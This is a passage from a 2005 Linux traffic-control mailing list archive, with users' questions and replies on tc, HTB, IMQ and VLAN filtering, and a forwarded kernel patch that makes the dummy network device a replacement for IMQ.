POSTROUTING -o $eth3 ... -j RETURN If i managed to do this, i promise, i will document it to the imq wiki. Any advice/help is appreciated! -- Udv, Nandor From vincent-perrier@club-internet.fr Sun Jan 30 20:41:35 2005 From: vincent-perrier@club-internet.fr (vincent perrier) Date: Sun, 30 Jan 2005 21:41:35 +0100 Subject: [LARTC] tc, VLAN, ebtables issue In-Reply-To: <000201c5075b$ed8dd1c0$1201a8c0@kingz> References: <000201c5075b$ed8dd1c0$1201a8c0@kingz> Message-ID: <1107117695.5790.21.camel@localhost.localdomain> Le lun 31/01/2005 à 07:12, kingz a écrit : > Hi all, > > I am testing one QOS system, I want to control bandwidth by VLAN id. To filter a vlan and put the flow in a class, I use the following code in a C program: ...tc filter add dev %s parent %d:%d prio %d protocol all u32" \ " match u32 0x00008100 0x0000ffff at -8" \ " match u32 0x0%03x0000 0x0fff0000 at -4" \ " flowid %d:%d\n"... The u32 filter can have negative position indication, here at position -4 there is the vlan number, and at -8 there is the 0X8100 identifying the tag, (the zero position being the start of the ip frame). This works only if you don't have the very modern ethernet cards that handle the tagged frames at their level. If you have such a card, then you never see the tagged frame, only normal ip frames coming from the "virtual" vlan ethernet devices. I don't think this is much help but good luck with your problem. From Snotling@gmx.net Mon Jan 31 00:59:21 2005 From: Snotling@gmx.net (=?ISO-8859-1?Q?=22Marcus_Sch=E4fer=22?=) Date: Mon, 31 Jan 2005 01:59:21 +0100 (MET) Subject: [LARTC] Problem with tcng Message-ID: <18620.1107133161@www22.gmx.net> Hi folks, first of all, sorry for my bad English ^^ and for the fact that I am a Linux N00b. I have a little Problem installing TCng on my Debian System. At the make install command the following error occured: tar: lib/tcng/include/klib/kernel/include: Cannot stat: no such file or directory tar: Error exit delayed from previous errors Can somebody help me ? greets Marcus -- GMX im TV ... Die Gedanken sind frei ... Schon gesehen? Jetzt Spot online ansehen: http://www.gmx.net/de/go/tv-spot From sko@uiuc.edu Mon Jan 31 02:51:26 2005 From: sko@uiuc.edu (Steven Y. Ko) Date: Sun, 30 Jan 2005 20:51:26 -0600 Subject: [LARTC] One interface forwarding (wireless ad-hoc mode)? Message-ID: <12de31ea.c71146d0.94fbe00@expms5.cites.uiuc.edu> Hi, I'm wondering if there's any simple solution. This problem looks very simple, so maybe there's a simple solution that I'm missing, but I couldn't do it yet. I'm configuring an wireless ad-hoc network with three laptops; A ---- B ---- C where A and C can only talk to B, and B can talk to both A and C. A and C cannot talk to each other. I'd like to configure B so that A can talk to C via B (and vice versa). The addresses are, A: 192.168.0.1 B: 192.168.0.2 C: 192.168.0.3 Since this is an wireless ad-hoc network, every machine has only one (wireless) interface, so B should receive a packet through its interface eth0 and forward it through eth0 again. Currently, A, B, and C only have the same basic routing table; Kernel IP routing table Destination Gateway Genmask Flags Metric Ref Use Iface 192.168.0.0 * 255.255.255.0 U 0 0 0 eth0 169.254.0.0 * 255.255.0.0 U 0 0 0 eth0 127.0.0.0 * 255.0.0.0 U 0 0 0 lo B cannot forward packets with this routing table. Is there any solution? Thanks, Steve From beatlelittle@yahoo.com.cn Mon Jan 31 03:26:29 2005 From: beatlelittle@yahoo.com.cn (CcM) Date: Mon, 31 Jan 2005 11:26:29 +0800 (CST) Subject: [LARTC] Anyone have the userguide's tc script and the corresponding ethloop input files? Message-ID: <20050131032629.71345.qmail@web15507.mail.cnb.yahoo.com> --0-1760319804-1107141989=:62961 Content-Type: text/plain; charset=gb2312 Content-Transfer-Encoding: 8bit I'm trying to get picture from ethloop and gnuplot. But the output seems weird. I still do not know why and want some examples. Thanks in advance. --------------------------------- Do You Yahoo!? ×¢²áÊÀ½çÒ»Á÷Æ·ÖʵÄÑÅ»¢Ãâ·ÑµçÓÊ --0-1760319804-1107141989=:62961 Content-Type: text/html; charset=gb2312 Content-Transfer-Encoding: 8bit
I'm trying to get picture from ethloop and gnuplot. But the output seems weird. I still do not know why and want some examples.
 
Thanks in advance.


Do You Yahoo!?
×¢²áÊÀ½çÒ»Á÷Æ·ÖʵÄÑÅ»¢Ãâ·ÑµçÓÊ --0-1760319804-1107141989=:62961-- From 64vn@cardvn.net Mon Jan 31 04:21:03 2005 From: 64vn@cardvn.net (Nguyen Dinh Nam) Date: Mon, 31 Jan 2005 11:21:03 +0700 Subject: [LARTC] [Fwd: dummy as IMQ replacement] Message-ID: <41FDB22F.2060000@cardvn.net> This is a multi-part message in MIME format. --------------080201070107030308040008 Content-Type: text/plain; charset=UTF-8; format=flowed Content-Transfer-Encoding: 7bit --------------080201070107030308040008 Content-Type: message/rfc822; name="dummy as IMQ replacement.eml" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="dummy as IMQ replacement.eml" X-Account-Key: account4 Received: from isp-go.FPT.NET ([210.245.0.153]) by isp-card.CARDVN.NET with Microsoft SMTPSVC(5.0.2195.6713); Mon, 31 Jan 2005 05:12:49 +0700 Received: from isp-mta2.fpt.vn ([210.245.0.151]) by isp-go.FPT.NET with Microsoft SMTPSVC(5.0.2195.6713); Mon, 31 Jan 2005 05:12:49 +0700 Received: from [192.48.159.27] by isp-mta2.fpt.vn [210.245.0.151] Received: from oss.sgi.com (localhost [127.0.0.1]) by oss.sgi.com (8.13.0/8.13.0) with ESMTP id j0UMCd5r015306; Sun, 30 Jan 2005 14:12:39 -0800 Received: with ECARTIS (v1.0.0; list netdev); Sun, 30 Jan 2005 14:12:36 -0800 (PST) Received: from lotus.znyx.com (znx208-2-156-007.znyx.com [208.2.156.7]) by oss.sgi.com (8.13.0/8.13.0) with ESMTP id j0UMCK8A015269 for ; Sun, 30 Jan 2005 14:12:21 -0800 Received: from [127.0.0.1] ([208.2.156.2]) by lotus.znyx.com (Lotus Domino Release 5.0.11) with ESMTP id 2005013014112061:27640 ; Sun, 30 Jan 2005 14:11:20 -0800 Subject: dummy as IMQ replacement From: Jamal Hadi Salim Reply-To: hadi@znyx.com To: netdev@oss.sgi.com Cc: Nguyen Dinh Nam , Remus , Andre Tomt , syrius.ml@no-log.org, Andy Furniss , Damion de Soto Organization: ZNYX Networks Message-Id: <1107123123.8021.80.camel@jzny.localdomain> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.2.2 Date: 30 Jan 2005 17:12:04 -0500 X-MIMETrack: Itemize by SMTP Server on Lotus/Znyx(Release 5.0.11 |July 24, 2002) at 01/30/2005 02:11:22 PM, Serialize by Router on Lotus/Znyx(Release 5.0.11 |July 24, 2002) at 01/30/2005 02:11:34 PM, Serialize complete at 01/30/2005 02:11:34 PM Content-Type: multipart/mixed; boundary="=-69HkpMiEza1wGz3le8L6" X-Virus-Scanned: ClamAV 0.80/650/Sun Jan 2 19:00:02 2005 clamav-milter version 0.80j on 127.0.0.1 X-Virus-Scanned: ClamAV 0.80/650/Sun Jan 2 19:00:02 2005 clamav-milter version 0.80j on 127.0.0.1 X-Virus-Status: Clean X-Virus-Status: Clean X-archive-position: 1022 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: hadi@znyx.com Precedence: bulk X-list: netdev Return-Path: netdev-bounce@oss.sgi.com X-OriginalArrivalTime: 30 Jan 2005 22:12:49.0625 (UTC) FILETIME=[D5B9A490:01C50718] --=-69HkpMiEza1wGz3le8L6 Content-Transfer-Encoding: 7bit Content-Type: text/plain This is in relation to providing functionality that IMQ was intending to using the dummy device and tc actions. Ive copied as many people as i could dig who i know may have interest in this. Please forward this to any other list which may have interest in the subject. It still needs some cleaning up; however, i dont wanna sit on it for another year - and now that mirred is out there, this is a good time. Advantage over current IMQ; cleaner in particular in in SMP; with a _lot_ less code. Old Dummy device functionality is preserved while new one only kicks in if you use actions. Didnt have to write a new device and finaly made a real dumb device to be a little smarter ;-> IMQ USES -------- As far as i know the reasons listed below is why people use IMQ. It would be nice to know of anything else that i missed because this is the requirements list i used. 1) qdiscs/policies that are per device as opposed to system wide. IMQ allows for sharing across multiple devices. 2) Allows for queueing incoming traffic for shaping instead of dropping. I am not aware of any study that shows policing is worse than shaping in achieving the end goal of rate control. I would be interested if anyone is experimenting. Nevertheless, this is still an alternative as opposed to making a system wide ingress change. 3) Very interesting use: if you are serving p2p you may wanna give preference to your own localy originated traffic (when responses come back) vs someone using your system to do bittorent. So QoSing based on state comes in as the solution. What people did to achive this was stick the IMQ somewhere prelocal hook. I think this is a pretty neat feature to have in Linux in general. (i.e not just for IMQ). But i wont go back to putting netfilter hooks in the device to satisfy this. I also dont think its worth it hacking dummy some more to be aware of say L3 info and play ip rule tricks to achieve this. --> Instead the plan is to have a contrack related action. This action will selectively either query/create contrack state on incoming packets. Packets could then be redirected to dummy based on what happens -> eg on incoming packets; if we find they are of known state we could send to a different queue than one which didnt have existing state. This all however is dependent on whatever rules the admin enters. What you can do with dummy currently with actions -------------------------------------------------- Lets say you are policing packets from alias 192.168.200.200/32 you dont want those to exceed 100kbps going out. tc filter add dev eth0 parent 1: protocol ip prio 10 u32 \ match ip src 192.168.200.200/32 flowid 1:2 \ action police rate 100kbit burst 90k drop If you run tcpdump on eth0 you will see all packets going out with src 192.168.200.200/32 dropped or not Extend the rule a little to see only the ones that made it out: tc filter add dev eth0 parent 1: protocol ip prio 10 u32 \ match ip src 192.168.200.200/32 flowid 1:2 \ action police rate 10kbit burst 90k drop \ action mirred egress mirror dev dummy0 Now fire tcpdump on dummy0 to see only those packets .. tcpdump -n -i dummy0 -x -e -t Essentially a good debugging/logging interface. If you replace mirror with redirect, those packets will be blackholed and will never make it out. This redirect behavior changes with new patch (but not the mirror). What you can do with dummy and attached patch ---------------------------------------------- Essentially provide functionality that most people use IMQ; sample below: -------- export TC="/sbin/tc" $TC qdisc add dev dummy0 root handle 1: prio $TC qdisc add dev dummy0 parent 1:1 handle 10: sfq $TC qdisc add dev dummy0 parent 1:2 handle 20: tbf rate 20kbit buffer 1600 limit 3000 $TC qdisc add dev dummy0 parent 1:3 handle 30: sfq $TC filter add dev dummy0 protocol ip pref 1 parent 1: handle 1 fw classid 1:1 $TC filter add dev dummy0 protocol ip pref 2 parent 1: handle 2 fw classid 1:2 ifconfig dummy0 up $TC qdisc add dev eth0 ingress # redirect all IP packets arriving in eth0 to dummy0 # use mark 1 --> puts them onto class 1:1 $TC filter add dev eth0 parent ffff: protocol ip prio 10 u32 \ match u32 0 0 flowid 1:1 \ action ipt -j MARK --set-mark 1 \ action mirred egress redirect dev dummy0 -------- Run A Little test: from another machine ping so that you have packets going into the box: ----- [root@jzny action-tests]# ping 10.22 PING 10.22 (10.0.0.22): 56 data bytes 64 bytes from 10.0.0.22: icmp_seq=0 ttl=64 time=2.8 ms 64 bytes from 10.0.0.22: icmp_seq=1 ttl=64 time=0.6 ms 64 bytes from 10.0.0.22: icmp_seq=2 ttl=64 time=0.6 ms --- 10.22 ping statistics --- 3 packets transmitted, 3 packets received, 0% packet loss round-trip min/avg/max = 0.6/1.3/2.8 ms [root@jzny action-tests]# ----- Now look at some stats: --- [root@jmandrake]:~# $TC -s filter show parent ffff: dev eth0 filter protocol ip pref 10 u32 filter protocol ip pref 10 u32 fh 800: ht divisor 1 filter protocol ip pref 10 u32 fh 800::800 order 2048 key ht 800 bkt 0 flowid 1:1 match 00000000/00000000 at 0 action order 1: tablename: mangle hook: NF_IP_PRE_ROUTING target MARK set 0x1 index 1 ref 1 bind 1 installed 4195sec used 27sec Sent 252 bytes 3 pkts (dropped 0, overlimits 0) action order 2: mirred (Egress Redirect to device dummy0) stolen index 1 ref 1 bind 1 installed 165 sec used 27 sec Sent 252 bytes 3 pkts (dropped 0, overlimits 0) [root@jmandrake]:~# $TC -s qdisc qdisc sfq 30: dev dummy0 limit 128p quantum 1514b Sent 0 bytes 0 pkts (dropped 0, overlimits 0) qdisc tbf 20: dev dummy0 rate 20Kbit burst 1575b lat 2147.5s Sent 210 bytes 3 pkts (dropped 0, overlimits 0) qdisc sfq 10: dev dummy0 limit 128p quantum 1514b Sent 294 bytes 3 pkts (dropped 0, overlimits 0) qdisc prio 1: dev dummy0 bands 3 priomap 1 2 2 2 1 2 0 0 1 1 1 1 1 1 1 1 Sent 504 bytes 6 pkts (dropped 0, overlimits 0) qdisc ingress ffff: dev eth0 ---------------- Sent 308 bytes 5 pkts (dropped 0, overlimits 0) [root@jmandrake]:~# ifconfig dummy0 dummy0 Link encap:Ethernet HWaddr 00:00:00:00:00:00 inet6 addr: fe80::200:ff:fe00:0/64 Scope:Link UP BROADCAST RUNNING NOARP MTU:1500 Metric:1 RX packets:6 errors:0 dropped:3 overruns:0 frame:0 TX packets:3 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:32 RX bytes:504 (504.0 b) TX bytes:252 (252.0 b) ----- Dummy continues to behave like it always did. You send it any packet not originating from the actions it will drop them. [In this case the three dropped packets were ipv6 ndisc]. My goal here is to start a discussion to see if people agree this is a good replacement for IMQ or whether to go another path. Clearly i would prefer to have this change in, but I am not religious and would listen to reason about how it should be done as long as no uneccessary clutter happens. Patch attached. cheers, jamal --=-69HkpMiEza1wGz3le8L6 Content-Transfer-Encoding: 7bit Content-Disposition: attachment; filename=dummy-act-2611rc1 Content-Type: text/plain; name=dummy-act-2611rc1; charset=ISO-8859-1 --- a/drivers/net/dummy.c.orig 2004-12-24 16:34:33.000000000 -0500 +++ b/drivers/net/dummy.c 2005-01-18 06:43:47.000000000 -0500 @@ -26,7 +26,14 @@ Nick Holloway, 27th May 1994 [I tweaked this explanation a little but that's all] Alan Cox, 30th May 1994 + */ +/* + * This driver isnt abused enough ;-> + * Here to add only _just_ a _feeew more_ features, + * 10 years after AC added comment above ;-> hehe - JHS +*/ + #include #include @@ -35,11 +42,128 @@ #include #include #include +#ifdef CONFIG_NET_CLS_ACT +#include +#endif + +#define TX_TIMEOUT (2*HZ) + +#define TX_Q_LIMIT 32 +struct dummy_private { + struct net_device_stats stats; +#ifdef CONFIG_NET_CLS_ACT + struct tasklet_struct dummy_tasklet; + int tasklet_pending; + /* mostly debug stats leave in for now */ + unsigned long stat_r1; + unsigned long stat_r2; + unsigned long stat_r3; + unsigned long stat_r4; + unsigned long stat_r5; + unsigned long stat_r6; + unsigned long stat_r7; + unsigned long stat_r8; + struct sk_buff_head rq; + struct sk_buff_head tq; +#endif +}; + +#ifdef CONFIG_NET_CLS_ACT +static void ri_tasklet(unsigned long dev); +#endif + static int numdummies = 1; static int dummy_xmit(struct sk_buff *skb, struct net_device *dev); static struct net_device_stats *dummy_get_stats(struct net_device *dev); +static void dummy_timeout(struct net_device *dev); +static int dummy_open(struct net_device *dev); +static int dummy_close(struct net_device *dev); + +static void dummy_timeout(struct net_device *dev) { + + int cpu = smp_processor_id(); + + dev->trans_start = jiffies; + printk("%s: BUG tx timeout on CPU %d\n",dev->name,cpu); + if (spin_is_locked((&dev->xmit_lock))) + printk("xmit lock grabbed already\n"); + if (spin_is_locked((&dev->queue_lock))) + printk("queue lock grabbed already\n"); +} + +#ifdef CONFIG_NET_CLS_ACT +static void ri_tasklet(unsigned long dev) { + + struct net_device *dv = (struct net_device *)dev; + struct dummy_private *dp = ((struct net_device *)dev)->priv; + struct net_device_stats *stats = &dp->stats; + struct sk_buff *skb = NULL; + + dp->stat_r4 +=1; + if (NULL == (skb = skb_peek(&dp->tq))) { + dp->stat_r5 +=1; + if (spin_trylock(&dv->xmit_lock)) { + dp->stat_r8 +=1; + while (NULL != (skb = skb_dequeue(&dp->rq))) { + skb_queue_tail(&dp->tq, skb); + } + spin_unlock(&dv->xmit_lock); + } else { + /* reschedule */ + dp->stat_r1 +=1; + goto resched; + } + } + + while (NULL != (skb = skb_dequeue(&dp->tq))) { + __u32 from = G_TC_FROM(skb->tc_verd); + + skb->tc_verd = 0; + skb->tc_verd = SET_TC_NCLS(skb->tc_verd); + stats->tx_packets++; + stats->tx_bytes+=skb->len; + if (from & AT_EGRESS) { + dp->stat_r6 +=1; + dev_queue_xmit(skb); + } else if (from & AT_INGRESS) { + + dp->stat_r7 +=1; + netif_rx(skb); + } else { + /* if netfilt is compiled in and packet is + tagged, we could reinject the packet back + this would make it do remaining 10% + of what current IMQ does + if someone really really insists then + this is the spot .. jhs */ + dev_kfree_skb(skb); + stats->tx_dropped++; + } + } + + if (spin_trylock(&dv->xmit_lock)) { + dp->stat_r3 +=1; + if (NULL == (skb = skb_peek(&dp->rq))) { + dp->tasklet_pending = 0; + if (netif_queue_stopped(dv)) + //netif_start_queue(dv); + netif_wake_queue(dv); + } else { + dp->stat_r2 +=1; + spin_unlock(&dv->xmit_lock); + goto resched; + } + spin_unlock(&dv->xmit_lock); + } else { +resched: + dp->tasklet_pending = 1; + tasklet_schedule(&dp->dummy_tasklet); + } + +} +#endif static int dummy_set_address(struct net_device *dev, void *p) { @@ -62,12 +186,17 @@ /* Initialize the device structure. */ dev->get_stats = dummy_get_stats; dev->hard_start_xmit = dummy_xmit; + dev->tx_timeout = &dummy_timeout; + dev->watchdog_timeo = TX_TIMEOUT; + dev->open = &dummy_open; + dev->stop = &dummy_close; + dev->set_multicast_list = set_multicast_list; dev->set_mac_address = dummy_set_address; /* Fill in device structure with ethernet-generic values. */ ether_setup(dev); - dev->tx_queue_len = 0; + dev->tx_queue_len = TX_Q_LIMIT; dev->change_mtu = NULL; dev->flags |= IFF_NOARP; dev->flags &= ~IFF_MULTICAST; @@ -77,18 +206,64 @@ static int dummy_xmit(struct sk_buff *skb, struct net_device *dev) { - struct net_device_stats *stats = netdev_priv(dev); + struct dummy_private *dp = ((struct net_device *)dev)->priv; + struct net_device_stats *stats = &dp->stats; + int ret = 0; + { stats->tx_packets++; stats->tx_bytes+=skb->len; + } +#ifdef CONFIG_NET_CLS_ACT + __u32 from = G_TC_FROM(skb->tc_verd); + if (!from || !skb->input_dev ) { +dropped: + dev_kfree_skb(skb); + stats->rx_dropped++; + return ret; + } else { + if (skb->input_dev) + skb->dev = skb->input_dev; + else + printk("warning!!! no idev %s\n",skb->dev->name); + skb->input_dev = dev; + if (from & AT_INGRESS) { + skb_pull(skb, skb->dev->hard_header_len); + } else { + if (!(from & AT_EGRESS)) { + goto dropped; + } + } + } + if (skb_queue_len(&dp->rq) >= dev->tx_queue_len) { + netif_stop_queue(dev); + } + dev->trans_start = jiffies; + skb_queue_tail(&dp->rq, skb); + if (!dp->tasklet_pending) { + dp->tasklet_pending = 1; + tasklet_schedule(&dp->dummy_tasklet); + } + +#else + stats->rx_dropped++; dev_kfree_skb(skb); - return 0; +#endif + return ret; } static struct net_device_stats *dummy_get_stats(struct net_device *dev) { - return netdev_priv(dev); + struct dummy_private *dp = ((struct net_device *)dev)->priv; + struct net_device_stats *stats = &dp->stats; +#ifdef CONFIG_NET_CLS_ACT_DEB + printk("tasklets stats %ld:%ld:%ld:%ld:%ld:%ld:%ld:%ld \n", + dp->stat_r1,dp->stat_r2,dp->stat_r3,dp->stat_r4, + dp->stat_r5,dp->stat_r6,dp->stat_r7,dp->stat_r8); +#endif + + return stats; } static struct net_device **dummies; @@ -97,12 +272,41 @@ module_param(numdummies, int, 0); MODULE_PARM_DESC(numdummies, "Number of dummy pseudo devices"); +static int dummy_close(struct net_device *dev) +{ + +#ifdef CONFIG_NET_CLS_ACT + struct dummy_private *dp = ((struct net_device *)dev)->priv; + + tasklet_kill(&dp->dummy_tasklet); + skb_queue_purge(&dp->rq); + skb_queue_purge(&dp->tq); +#endif + netif_stop_queue(dev); + return 0; +} + +static int dummy_open(struct net_device *dev) +{ + +#ifdef CONFIG_NET_CLS_ACT + struct dummy_private *dp = ((struct net_device *)dev)->priv; + + tasklet_init(&dp->dummy_tasklet, ri_tasklet, (unsigned long)dev); + skb_queue_head_init(&dp->rq); + skb_queue_head_init(&dp->tq); +#endif + netif_start_queue(dev); + return 0; +} + + static int __init dummy_init_one(int index) { struct net_device *dev_dummy; int err; - dev_dummy = alloc_netdev(sizeof(struct net_device_stats), + dev_dummy = alloc_netdev(sizeof(struct dummy_private), "dummy%d", dummy_setup); if (!dev_dummy) --=-69HkpMiEza1wGz3le8L6-- --------------080201070107030308040008-- From nug@sch.bme.hu Mon Jan 31 05:57:50 2005 From: nug@sch.bme.hu (=?ISO-8859-1?Q?T=F3th_N=E1ndor?=) Date: Mon, 31 Jan 2005 06:57:50 +0100 Subject: [LARTC] One interface forwarding (wireless ad-hoc mode)? In-Reply-To: <12de31ea.c71146d0.94fbe00@expms5.cites.uiuc.edu> References: <12de31ea.c71146d0.94fbe00@expms5.cites.uiuc.edu> Message-ID: <41FDC8DE.9080707@sch.bme.hu> Hi! Steven Y. Ko wrote: > Hi, > > I'm wondering if there's any simple solution. This problem > looks very simple, so maybe there's a simple solution that > I'm missing, but I couldn't do it yet. > > I'm configuring an wireless ad-hoc network with three > laptops; > > A ---- B ---- C > > > B cannot forward packets with this routing table. Is there > any solution? Maybe: # ip forward is a must for a gateway echo "1" > /proc/sys/net/ipv4/ip_forward -- Udv, Nandor From nug@sch.bme.hu Mon Jan 31 06:01:04 2005 From: nug@sch.bme.hu (=?ISO-8859-1?Q?T=F3th_N=E1ndor?=) Date: Mon, 31 Jan 2005 07:01:04 +0100 Subject: [LARTC] Problem with tcng In-Reply-To: <18620.1107133161@www22.gmx.net> References: <18620.1107133161@www22.gmx.net> Message-ID: <41FDC9A0.1000708@sch.bme.hu> Hi! Marcus Schäfer wrote: > Hi folks, > > first of all, sorry for my bad English ^^ and for the fact that I am a Linux > N00b. > > I have a little Problem installing TCng on my Debian System. At the make > install command the following error occured: > > tar: lib/tcng/include/klib/kernel/include: Cannot stat: no such file or > directory > tar: Error exit delayed from previous errors > > Can somebody help me ? Maybe: http://www.google.co.hu/search?q=tcng+debian&sourceid=mozilla-search&start=0&start=0&ie=utf-8&oe=utf-8&client=firefox-a&rls=org.mozilla:en-US:official --> http://talk.trekweb.com/~jasonb/articles/tcng_shaping.html -- Udv, Nandor From rsenykoff@harrislogic.com Mon Jan 31 06:05:51 2005 From: rsenykoff@harrislogic.com (rsenykoff@harrislogic.com) Date: Mon, 31 Jan 2005 00:05:51 -0600 Subject: [LARTC] PRIO inside HTB - trouble attaching filters correctly? In-Reply-To: Message-ID: Hello everyone! I'm simply trying to put a PRIO inside an HTB (used to throttle). I've got interactive traffic on the network that I want to give priority (VoIP + Citrix + Video). I've used the filters in a CBQ script fine, but am having trouble adjusting them to this setup such that they properly assign the traffic. tc qdisc del root dev $e tc qdisc add dev $e root handle 1: htb default 3 tc class add dev $e parent 1: classid 1:1 htb rate $wanRate # now that we've throttled the interface, we create the PRIO queue tc qdisc add dev $e parent 1:1 handle 10: prio # instantly creates classes 10:1, 10:2, 10:2 tc qdisc add dev $e parent 10:1 handle 1: pfifo tc qdisc add dev $e parent 10:2 handle 2: pfifo tc qdisc add dev $e parent 10:3 handle 3: sfq Fixed! The problem is that htb was not seeing any of the rules that I applied to the lower stuff, so it wasn't forwarding traffic there. The fix: tc qdisc add dev $e root handle 1: htb default 1 By saying default 1, all htb traffic gets forwarded to classid 1:1, which has the PRIO queue attached. -Ron From don-lartcxx@isis.cs3-inc.com Mon Jan 31 07:24:16 2005 From: don-lartcxx@isis.cs3-inc.com (Don Cohen) Date: Sun, 30 Jan 2005 23:24:16 -0800 Subject: [LARTC] facilities to output to monitoring interfaces In-Reply-To: <20050131060425.32096.54161.Mailman@outpost.ds9a.nl> References: <20050131060425.32096.54161.Mailman@outpost.ds9a.nl> Message-ID: <16893.56608.688927.473035@isis.cs3-inc.com> How can one copy packets to a monitoring interface? For a start I'd like to know how to just copy all of those that arrive on eth1 out to eth2 in addition to whatever else would normally happen to them. After that, a number of interesting possibilities: - Copy only those with specified properties. (I suppose a random probability of copying fits into this category.) - Copy only those that are actually sent (so if the packet is dropped anywhere along the way there's no "false positive"). - Copy only part of the packet, say, only the first 64 bytes. - Extract specified parts of packets and collect the results into larger packets that hold the data for many of the original packets. From George Alexandru Dragoi Mon Jan 31 09:31:02 2005 From: George Alexandru Dragoi (George Alexandru Dragoi) Date: Mon, 31 Jan 2005 11:31:02 +0200 Subject: [LARTC] Question about filters Message-ID: <3063e505013101311375c1a@mail.gmail.com> Hello, I need to do the following: make a htb qdisc with its class of 70mbit then add some classes, one of 10mbit, another of 10mbit, one of 5mbit and the rest in last class (with also child classes). The 5mbit class is a quaranteed one, and it is marked with a special dscp. I will add an HFSC qdisc on this one, and then several classes to it. When i add filters, what should i use as parent to say the traffic should go to a HFSC class inside the 5mbit qdisc, or to the 10mbit class or to the childs of last class ? From Denis Kot Mon Jan 31 09:43:36 2005 From: Denis Kot (Denis Kot) Date: Mon, 31 Jan 2005 11:43:36 +0200 Subject: [LARTC] why there is any traffic in default class? Message-ID: <3cfad9ca05013101435f72a4d9@mail.gmail.com> I have: tc qdisc add dev imq0 root handle 1: htb default 30 tc class add dev imq0 parent 1: classid 1:1 htb rate 512kbit ceil 512kbit tc class add dev imq0 parent 1:1 classid 1:30 htb rate 64kbit ceil 512kbit then: iptables -t mangle -A PREROUTING -i ppp0 -s 192.168.2.2 -j IMQ --todev 0 tc class add dev imq0 parent 1:1 classid 1:22 htb rate 64kbit ceil 128kbit tc filter add dev imq0 protocol ip parent 1:0 prio 1 u32 match ip src 192.168.2.2 flowid 1:22 so, as I understand any traffic from source 192.168.2.2 and from interface ppp0 must be going directly in to class 1:22, so default class 30 must not have any traffic. isn=B4t it? --=20 Denis Kot denis?jabber.org.by ICQ: 13680126 Mobil: +375 29 6-1234-78 From nug@sch.bme.hu Mon Jan 31 09:55:53 2005 From: nug@sch.bme.hu (=?ISO-8859-1?Q?T=F3th_N=E1ndor?=) Date: Mon, 31 Jan 2005 10:55:53 +0100 Subject: [LARTC] why there is any traffic in default class? In-Reply-To: <3cfad9ca05013101435f72a4d9@mail.gmail.com> References: <3cfad9ca05013101435f72a4d9@mail.gmail.com> Message-ID: <41FE00A9.6050004@sch.bme.hu> Hi! Denis Kot wrote: > I have: > > tc qdisc add dev imq0 root handle 1: htb default 30 > tc class add dev imq0 parent 1: classid 1:1 htb rate 512kbit ceil 512kbit > tc class add dev imq0 parent 1:1 classid 1:30 htb rate 64kbit ceil 512kbit > > then: > > iptables -t mangle -A PREROUTING -i ppp0 -s 192.168.2.2 -j IMQ --todev 0 If i understand you correctly, it should be: iptables -t mangle -A PREROUTING -i ppp0 -j IMQ --todev 0 iptables -t mangle -A PREROUTING -s 192.168.2.2 -j IMQ --todev 0 Your rule means: traffic which came from ppp0 AND has source ip 192.168.2.2 go to IMQ. > tc class add dev imq0 parent 1:1 classid 1:22 htb rate 64kbit ceil 128kbit > tc filter add dev imq0 protocol ip parent 1:0 prio 1 u32 match ip src > 192.168.2.2 flowid 1:22 > > so, as I understand any traffic from source 192.168.2.2 and from > interface ppp0 must be going directly in to class 1:22, so default > class 30 must not have any traffic. isn´t it? This part may or may not be ok, i do not know. -- Udv, Nandor From Denis Kot Mon Jan 31 10:11:12 2005 From: Denis Kot (Denis Kot) Date: Mon, 31 Jan 2005 12:11:12 +0200 Subject: [LARTC] why there is any traffic in default class? In-Reply-To: <41FE00A9.6050004@sch.bme.hu> References: <3cfad9ca05013101435f72a4d9@mail.gmail.com> <41FE00A9.6050004@sch.bme.hu> Message-ID: <3cfad9ca05013102118860b0@mail.gmail.com> my rules is right, cause ppp0 is vpn client who has (applied by pppd) ip 192.168.2.2. so I want any traffic from ppp0 AND 192.168.2.2 route to class 1:22 On Mon, 31 Jan 2005 10:55:53 +0100, T=F3th N=E1ndor wrote: > Hi! >=20 > Denis Kot wrote: > > I have: > > > > tc qdisc add dev imq0 root handle 1: htb default 30 > > tc class add dev imq0 parent 1: classid 1:1 htb rate 512kbit ceil 512kb= it > > tc class add dev imq0 parent 1:1 classid 1:30 htb rate 64kbit ceil 512k= bit > > > > then: > > > > iptables -t mangle -A PREROUTING -i ppp0 -s 192.168.2.2 -j IMQ --todev= 0 >=20 > If i understand you correctly, it should be: > iptables -t mangle -A PREROUTING -i ppp0 -j IMQ --todev 0 > iptables -t mangle -A PREROUTING -s 192.168.2.2 -j IMQ --todev 0 >=20 > Your rule means: traffic which came from ppp0 AND has source ip > 192.168.2.2 go to IMQ. >=20 > > tc class add dev imq0 parent 1:1 classid 1:22 htb rate 64kbit ceil 128k= bit > > tc filter add dev imq0 protocol ip parent 1:0 prio 1 u32 match ip src > > 192.168.2.2 flowid 1:22 > > > > so, as I understand any traffic from source 192.168.2.2 and from > > interface ppp0 must be going directly in to class 1:22, so default > > class 30 must not have any traffic. isn=B4t it? >=20 > This part may or may not be ok, i do not know. >=20 > -- > Udv, > Nandor > _______________________________________________ > LARTC mailing list / LARTC@mailman.ds9a.nl > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ >=20 --=20 Denis Kot denis?jabber.org.by ICQ: 13680126 Mobil: +375 29 6-1234-78 From jesper@ballbreaker.dk Mon Jan 31 11:32:28 2005 From: jesper@ballbreaker.dk (Jesper Lund) Date: Mon, 31 Jan 2005 12:32:28 +0100 Subject: [LARTC] tc segmentation faults when trying to add pfifo_fast as leaf discipline on a HTB class Message-ID: <20050131123228.455f6bc2.jesper@ballbreaker.dk> Hello I am trying to attach pfifo_fast to af leaf htb class. But tc segmenetation faults. If I try the failing command throug strace, it shows me that the last thing tc tries to do just before the segmentation fault, is to try to open a file called "/usr/lib/tc/q_pfifo_fast.so". Of course i have tried to find worthfull information around the Internet, but haven't found anything useful. Is pfifo_fast meant to be used *only* as a default qdisc on an interface ? Or can I use it as a qdisc in a HTB class ? I don't know what usefull information you want about my setup, but i don't think that you need to know about it... :) Otherwise I will tryu to explain more, on request. Regards, Jesper Lund From askar@askarali.info Mon Jan 31 12:48:16 2005 From: askar@askarali.info (Askar) Date: Mon, 31 Jan 2005 17:48:16 +0500 Subject: [LARTC] load balancing between two default gateways Message-ID: 